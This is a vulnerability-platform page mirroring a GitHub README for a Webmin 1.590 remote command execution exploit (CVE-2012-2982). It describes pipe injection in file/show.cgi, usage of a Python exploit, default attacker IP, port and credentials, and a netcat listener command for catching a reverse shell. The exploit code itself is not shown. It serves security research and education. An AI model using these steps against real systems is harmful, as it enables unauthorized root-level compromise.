漏洞平台

POC详情： a6f518181c682ab2f178fe2f32e2162fbb22e86d

来源

https://github.com/SieGer05/CVE-2012-2982-Webmin-Exploit

关联漏洞

标题： Webmin ‘file/show.cgi’任意命令执行漏洞 (CVE-2012-2982)
描述：Webmin是澳大利亚软件开发者Jamie Cameron和Webmin社区共同开发的一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.590版本和较早版本中的file/show.cgi中存在漏洞。远程认证用户可利用该漏洞通过路径名中的无效字符如‘|’(竖线)字符，执行任意命令。

描述

PoC exploit for CVE-2012-2982 (Webmin RCE), for educational purposes.

介绍

# Webmin 1.590 Remote Command Execution Exploit (CVE-2012-2982)

## Overview

This repository contains a Proof-of-Concept (PoC) exploit for **CVE-2012-2982**, a remote authenticated command execution vulnerability affecting **Webmin versions 1.590 and earlier**. The vulnerability resides in the **/file/show.cgi** endpoint, where an attacker can execute arbitrary commands by injecting special characters (such as the `|` pipe symbol) in a manipulated request.

This PoC is intended for **educational and security research purposes only**. Unauthorized exploitation of systems without permission is illegal and unethical.

## CVE-2012-2982 Details

### Description

Webmin is a popular web-based system administration tool for managing Unix-based systems. In **versions 1.590 and earlier**, a security flaw exists in the **File Manager module**. The issue arises from improper sanitization of user input when interacting with the **/file/show.cgi** script. By injecting shell metacharacters (`|`), an authenticated user can execute arbitrary commands on the target system with the **privileges of the Webmin process** (often root).

### Impact

- **Affected versions**: Webmin **1.590 and earlier**
    
- **Attack prerequisites**:
    
    - Attacker must have valid Webmin credentials (low-privileged user account is enough).
        
    - The File Manager module must be accessible.
        
- **Exploitation allows**:
    
    - Remote code execution (RCE)
        
    - Privilege escalation (if Webmin is running as root)
        
    - System compromise
        

### Vulnerable Endpoint

The vulnerable endpoint is:

```
http://<target_ip>:10000/file/show.cgi
```

The attack exploits improper input validation when passing a file path, allowing execution of injected shell commands via `|`.

## PoC Exploit

This repository contains a Python exploit script that automates:

1. **Authentication**: Logs into Webmin using provided credentials.
    
2. **Session ID Extraction**: Retrieves the session ID required for authenticated requests.
    
3. **Payload Execution**: Sends a malicious request to execute arbitrary commands.
    

### Features

- **Randomized Execution Path**: Uses a randomly generated filename to evade detection.
    
- **Reverse Shell Support**: Generates a reverse shell payload to connect back to the attacker's machine.
    
- **Error Handling**: Handles request failures gracefully.
    
- **Modular Design**: Easy to modify for testing different payloads.
    

## Installation & Usage

### Prerequisites

- Python 3
    
- `requests` library (`pip install requests`)
    
- A Webmin instance (vulnerable version) for testing (use a controlled lab environment)
    

### Running the Exploit

**Usage:**

```
python3 exploit.py <target_IP>
```

Example:

```
python3 exploit.py 192.168.1.100
```

#### Default Configuration (Modify as Needed)

- **Attacker IP (**`**lhost**`**)**: `10.21.48.124`
    
- **Attacker Port (**`**lport**`**)**: `1937`
    
- **Target Webmin Credentials**:
    
    - Username: `user1`
        
    - Password: `1user`
        

If successful, the exploit establishes a reverse shell connection to the attacker's machine.

## Setting Up Netcat Listener on the Attack Machine

Before running the exploit, set up a **Netcat listener** on your attack machine to receive the reverse shell:

```
nc -lvnp 1937
```

Once the exploit executes successfully, you should receive a shell connection from the target machine.

## Educational Purpose Only

This PoC is strictly for **security research and educational purposes**. It should only be used in **authorized penetration testing environments**. Unauthorized use against production systems is a **violation of cybersecurity laws** and may result in legal consequences.

## References

- [Official CVE Entry](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2982)
    
- [Metasploit Module](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/webmin_show_cgi_exec.rb)
    
- [American InfoSec Advisory](http://www.americaninfosec.com/research/dossiers/AISG-12-001.pdf)
    

## Disclaimer

The author are **not responsible** for any misuse of this exploit. Use this PoC **only for legal security testing** and ethical hacking activities.

文件快照


 [4.0K]  /data/pocs/a6f518181c682ab2f178fe2f32e2162fbb22e86d
├── [2.3K]  cve-2012-2982-exploit.py
├── [1.0K]  LICENSE
└── [4.2K]  README.md

0 directories, 3 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。